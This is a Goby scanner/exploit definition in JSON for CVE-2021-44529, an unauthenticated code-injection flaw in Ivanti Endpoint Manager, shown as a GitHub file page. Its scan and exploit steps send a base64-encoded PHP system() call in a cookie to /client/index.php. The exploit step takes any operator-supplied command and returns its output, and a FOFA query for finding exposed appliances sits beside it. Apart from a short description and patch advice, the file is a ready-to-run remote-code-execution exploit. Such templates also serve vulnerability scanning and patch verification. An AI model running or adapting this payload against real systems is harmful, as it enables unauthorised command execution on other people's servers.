Goby/json/Ivanti-Endpoint-Manager-cod...

155 lines
5.6 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Ivanti Endpoint Manager code injection (CVE-2021-44529)",
"Description": "<p><span style=\"color: rgb(0, 0, 0); font-size: 14px;\"></span>Ivanti Endpoint Manager (EPM) is a set of endpoint security managers from Ivanti Corporation of the United States.</p><p>A security vulnerability exists in Ivanti Endpoint Manager (EPM) that stems from Ivanti EPM allowing an unauthenticated user to execute arbitrary code with limited privileges.<br></p>",
"Product": "Ivanti Endpoint Manager",
"Homepage": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44529.yaml",
"DisclosureDate": "2022-03-23",
"Author": "abszse",
"FofaQuery": "title=\"LANDesk(R) Cloud Services Appliance\"",
"GobyQuery": "title=\"LANDesk(R) Cloud Services Appliance\"",
"Level": "3",
"Impact": "<p>A security vulnerability exists in Ivanti Endpoint Manager (EPM) that stems from Ivanti EPM allowing an unauthenticated user to execute arbitrary code with limited privileges.<br></p>",
"Recommendation": "<p>Set up a whitelist using a security device firewall, etc.</p><p>Timely update to secure version: <a href=\"https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US\">https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US</a></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "c3lzdGVtKCJpZCIpOw==",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/client/index.php",
"follow_redirect": false,
"header": {
"Cookie": "ab=ab; c=c3lzdGVtKCJpZCIpOw==; d=; e=;"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "gid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/client/index.php",
"follow_redirect": false,
"header": {
"Cookie": "ab=ab; c={{{cmd}}}; d=; e=;"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
"CVE-2021-44529"
],
"CNNVD": [
"CNNVD-202112-724"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "Ivanti Endpoint Manager 代码注入漏洞 (CVE-2021-44529)",
"Product": "Ivanti Endpoint Manager",
"Description": "<p>Ivanti Endpoint ManagerEPM是美国Ivanti公司的一套端点安全管理器。<br></p><p><span style=\"color: rgb(0, 0, 0); font-size: 14px;\">Ivanti Endpoint ManagerEPM 存在安全漏洞该漏洞源于Ivanti EPM允许未经身份验证的用户以有限的权限执行任意代码。</span><br></p>",
"Recommendation": "<p>1、使用安全设备防火墙等设置白名单</p><p>2、及时更新到安全版本<a href=\"https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US\">https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US</a></p>",
"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 14px;\">Ivanti Endpoint ManagerEPM 存在安全漏洞该漏洞源于Ivanti EPM允许未经身份验证的用户以有限的权限执行任意代码。</span><br></p>",
"VulType": [
"代码执⾏"
],
"Tags": [
"代码执⾏"
]
},
"EN": {
"Name": "Ivanti Endpoint Manager code injection (CVE-2021-44529)",
"Product": "Ivanti Endpoint Manager",
"Description": "<p><span style=\"color: rgb(0, 0, 0); font-size: 14px;\"></span>Ivanti Endpoint Manager (EPM) is a set of endpoint security managers from Ivanti Corporation of the United States.</p><p>A security vulnerability exists in Ivanti Endpoint Manager (EPM) that stems from Ivanti EPM allowing an unauthenticated user to execute arbitrary code with limited privileges.<br></p>",
"Recommendation": "<p>Set up a whitelist using a security device firewall, etc.</p><p>Timely update to secure version: <a href=\"https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US\">https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US</a></p>",
"Impact": "<p>A security vulnerability exists in Ivanti Endpoint Manager (EPM) that stems from Ivanti EPM allowing an unauthenticated user to execute arbitrary code with limited privileges.<br></p>",
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}